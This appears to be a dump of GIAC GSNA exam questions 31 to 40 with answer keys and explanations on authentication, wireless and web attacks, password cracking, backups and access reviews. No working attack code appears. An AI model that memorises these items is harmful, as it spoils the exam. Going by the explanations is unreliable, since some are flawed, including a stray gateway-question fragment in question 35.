GIAC GIAC Information Security GSNA Questions & Answers

• Question 31:

  Which of the following statements is true about the Digest Authentication scheme?

  A. A valid response from the client contains a checksum of the username, the password, the given random value, the HTTP method, and the requested URL.

  B. In this authentication scheme, the username and password are passed with every request, not just when the user first types them.

  C. The password is sent over the network in clear text format.

  D. It uses the base64 encoding encryption scheme.

  Correct Answer: A

  The Digest Authentication scheme is a replacement of the Basic Authentication scheme. This authentication scheme is based on the challenge response model. In Digest authentication, the password is never sent across the network in clear text format but is always transmitted as an MD5 digest of the user's password. In this way, the password cannot be determined with the help of a sniffer. How does it work? In this authentication scheme, an optional header allows the server to specify the algorithm used to create the checksum or digest (by default, the MD5 algorithm). The Digest Authentication scheme provides the challenge using a randomly chosen value. This randomly chosen value is a server- specified data string which may be uniquely generated each time a 401 response is made. A valid response contains a checksum (by default, the MD5 checksum) of the username, the password, the given random value, the HTTP method, and the requested URL. In this way, the password is never sent in clear text format. Drawback: Although the password is not sent in clear text format, an attacker can gain access with the help of the digested password, since the digested password is really all the information needed to access the web site. Answer: B, C, D are incorrect. These statements are true about the Basic Authentication scheme.

• Question 32:

  You have detected what appears to be an unauthorized wireless access point on your network. However, this access point has the same MAC address as one of your real access points and is broadcasting with a stronger signal.

  What is this called?

  A. Buesnarfing

  B. The evil twin attack

  C. WAP cloning

  D. DOS

  Correct Answer: B

  In the evil twin attack, a rogue wireless access point is set up that has the same MAC address as one of your legitimate access points. That rogue WAP will often then initiate a denial of service attack on your legitimate access point making it

  unable to respond to users, so they are redirected to the 'evil twin'. Answer: A is incorrect. Blue snarfing is the process of taking over a PDA. Answer: D is incorrect. A DOS may be used as part of establishing an evil twin, but this attack is not

  specifically for denial of service.

  Answer C is incorrect. While you must clone a WAP MAC address, the attack is not called WAP cloning.

• Question 33:

  You work as a Computer Hacking Forensic Investigator for SecureNet Inc. You want to investigate Cross- Site Scripting attack on your company's Website. Which of the following methods of investigation can you use to accomplish the task?

  A. Review the source of any HTML-formatted e-mail messages for embedded scripts or links in the URL to the company's site.

  B. Look at the Web servers logs and normal traffic logging.

  C. Use Wireshark to capture traffic going to the server and then searching for the requests going to the input page, which may give log of the malicious traffic and the IP address of the source.

  D. Use a Web proxy to view the Web server transactions in real time and investigate any communication with outside servers.

  Correct Answer: ABD

  You can use the following methods to investigate Cross-Site Scripting attack:

  1.

  Look at the Web servers logs and normal traffic logging.

  2.

  Use a Web proxy to view the Web server transactions in real time and investigate any communication with outside servers.

  3.

  Review the source of any HTML-formatted e-mail messages for embedded scripts or links in the URL to the company's site. Answer: C is incorrect. This method is not used to investigate Cross-Site Scripting attack.

• Question 34:

  Many organizations create network maps of their network system to visualize the network and understand the relationship between the end devices and the transport layer that provide services. Which of the following are the techniques used for network mapping by large organizations?

  Each correct answer represents a complete solution. Choose three.

  A. Route analytics

  B. Active Probing

  C. SNMP-based approaches

  D. Packet crafting

  Correct Answer: ABC

  Many organizations create network maps of their network system. These maps can be made manually using simple tools such as Microsoft Visio, or the mapping process can be simplified by using tools that integrate auto network discovery with Network mapping. Many of the vendors from the Notable network Mappers list enable a user to do the following: Customize the maps Include one's own labels Add un-discoverable items Add background images Sophisticated mapping is used to help visualize the network and understand relationships between end devices and the transport layers that provide service. Items such as bottlenecks and root cause analysis can be easier to spot using these tools. There are three main techniques used for network mapping: SNMP-based approaches, Active Probing, and Route analytics. The SNMP-based approach retrieves data from Router and Switch MIBs in order to build the network map. The Active Probing approach relies on a series of trace route like probe packets in order to build the network map. The Route analytics approach relies on information from the routing protocols to build the network map. Each of the three approaches has advantages and disadvantages in the methods that they use. Answer: D is incorrect. Packet crafting is a technique that allows probing firewall rule-sets and finding entry points into the targeted system or network. This can be done with a packet generator. A packet generator is a type of software that generates random packets or allows the user to construct detailed custom packets. Packet generators utilize raw sockets. This is useful for testing implementations of IP stacks for bugs and security vulnerabilities.

• Question 35:

  You have been assigned a project to develop a Web site for a construction company. You plan to develop a Web site and want to get more control over the appearance and presentation of the Web pages. You also want to increase your ability to precisely specify the position and appearance of the elements on a page and create special effects. You plan to use cascading style sheets (CSS). You want to define styles only for the active page.

  Which type of style sheet will you use?

  A. Embedded Style Sheet

  B. Inline Style Sheet

  C. Internal Style Sheet

  D. External Style Sheet

  Correct Answer: A

  To define styles only for the active page you should use embedded style sheet. Cascading style sheets (CSS) are used so that the Website authors can exercise greater control on the appearance and presentation of their Web pages. And also because they increase the ability to precisely point to the location and look of elements on a Web page and help in creating special effects. Cascading Style Sheets have codes, which are interpreted applied by the browser on to the Web pages and their elements. There are three types of cascading style sheets. External Style Sheets Embedded Style Sheets Inline Style Sheets External Style Sheets are used whenever consistency in style is required throughout a Web site. A typical external style sheet uses a .css file extension, which can be edited using a text editor such as a Notepad. Embedded Style Sheets are used for defining styles for an active page. Inline Style Sheets are used for defining individual elements of a page. Reference: TechNet, Contents: Microsoft Knowledgebase, February 2000 issue PSS ID Number: Q179628 You want to enable Host A to access the Internet. For this, you need to configure the default gateway settings. Choose the appropriate address to accomplish the task.

• Question 36:

  Brutus is a password cracking tool that can be used to crack the following authentications: HTTP (Basic Authentication) HTTP (HTML Form/CGI) POP3 (Post Office Protocol v3) FTP (File Transfer Protocol) SMB (Server Message Block) Telnet Which of the following attacks can be performed by Brutus for password cracking?

  A. Man-in-the-middle attack

  B. Hybrid attack

  C. Replay attack

  D. Brute force attack

  E. Dictionary attack

  Correct Answer: BDE

  Brutus can be used to perform brute force attacks, dictionary attacks, or hybrid attacks.

• Question 37:

  John used to work as a Network Administrator for We-are-secure Inc. Now he has resigned from the company for personal reasons. He wants to send out some secret information of the company. To do so, he takes an image file and simply uses a tool image hide and embeds the secret file within an image file of the famous actress, Jennifer Lopez, and sends it to his Yahoo mail id. Since he is using the image file to send the data, the mail server of his company is unable to filter this mail.

  Which of the following techniques is he performing to accomplish his task?

  A. Web ripping

  B. Steganography

  C. Email spoofing

  D. Social engineering

  Correct Answer: B

  According to the scenario, John is performing the Steganography technique for sending malicious data. Steganography is an art and science of hiding information by embedding harmful messages within other seemingly harmless messages. It works by replacing bits of unused data, such as graphics, sound, text, and HTML, with bits of invisible information in regular computer files. This hidden information can be in the form of plain text, cipher text, or even in the form of images. Answer: A is incorrect. Web ripping is a technique in which the attacker copies the whole structure of a Web site to the local disk and obtains all files of the Web site. Web ripping helps an attacker to trace the loopholes of the Web site. Answer: D is incorrect. Social engineering is the art of convincing people and making them disclose useful information such as account names and passwords. This information is further exploited by hackers to gain access to a user's computer or network. This method involves mental ability of the people to trick someone rather than their technical skills. A user should always distrust people who ask him for his account name or password, computer name, IP address, employee ID, or other information that can be misused. Answer: C is incorrect. John is not performing email spoofing. In email spoofing, an attacker sends emails after writing another person's mailing address in the from field of the emailed.

• Question 38:

  Which of the following backup sites takes the longest recovery time?

  A. Mobile backup site

  B. Warm site

  C. Cold site

  D. Hot site

  Correct Answer: C

  A cold backup site takes the longest recovery time. It is the most inexpensive type of backup site for an organization to operate. It does not include backed up copies of data and information from the original location of the organization, nor does it include hardware already set up. The lack of hardware contributes to the minimal startup costs of the cold site, but requires additional time following the disaster to have the operation running at a capacity close to that prior to the disaster. Answer: D is incorrect. A hot site is a duplicate of the original site of the organization, with full computer systems as well as near- complete backups of user data. Real time synchronization between the two sites may be used to completely mirror the data environment of the original site using wide area network links and specialized software. Ideally, a hot site will be up and running within a matter of hours or even less. Answer: A is incorrect. Although a mobile backup site provides rapid recovery, it does not provide full recovery in time. Hence, a hot site takes the shortest recovery time. Answer: B is incorrect. A warm site is, quite logically, a compromise between hot and cold. These sites will have hardware and connectivity already established, though on a smaller scale than the original production site or even a hot site. Warm sites will have backups on hand, but they may not be complete and may be between several days and a week old. An example would be backup tapes sent to the warm site by courier.

• Question 39:

  You work as a Security manager for Qualoxizz Inc. Your company has number of network switches in the site network infrastructure. Which of the following actions will you perform to ensure the security of the switches in your company?

  A. Open up all the unused management ports.

  B. Set similar passwords for each management port.

  C. Set long session timeouts.

  D. Ignore usage of the default account settings.

  Correct Answer: D

  A switch with a management port using a default user account permits an attacker to intrude inside by making connections using one or more of the well-known default user accounts (e.g., administrator, root, security). Therefore, the default

  account settings should not be used. Answer: A is incorrect. The unused management ports on a switch should always be blocked to prevent port scanning attacks from the attackers.

  Answer: B is incorrect. Setting similar passwords on all management ports increases the vulnerability of password cracking. The matching passwords on all ports can be used by the attacker to break into all ports once the password of one of

  the ports is known.

  Answer: C is incorrect. Short timeout sessions should always be set to reduce the session period. If the connections to a management port on a switch do not have a timeout period set or have a large timeout period (greater than 9 minutes),

  then the connections will be more available for an attacker to hijack them.

• Question 40:

  You are the Network Admin for a company. You are concerned about users having access to items they should not. Your concern is that they may inadvertently have been granted access to those resources. When conducting a user access and rights review, which of the following is most likely to show you such unintentional granting of user rights?

  A. IDS Logs

  B. Access Control Lists

  C. Server logs

  D. Group Membership

  Correct Answer: D

  Most often user rights are determined by the groups the user belongs to. In some cases a user may mistakenly be added to a group they should not be. It is also common that a user moves within the organization, but is still retained in their previous group giving them those rights. Answer: B is incorrect. Access Control Lists are usually setup up manually. This means that a person would not likely be inadvertently added. You might want to check the ACL's, and you might find some issues, but this is not the most likely way to find users with inappropriate rights. Answer: C is incorrect. At best server logs can show you if a user accessed a resource. But a user could have access to a resource, and simply not have used that access yet. Answer: A is incorrect. IDS logs will only help you identify potential attacks. Unless you suspect the user of intentionally trying to break into resources, an IDS log will not help in this scenario.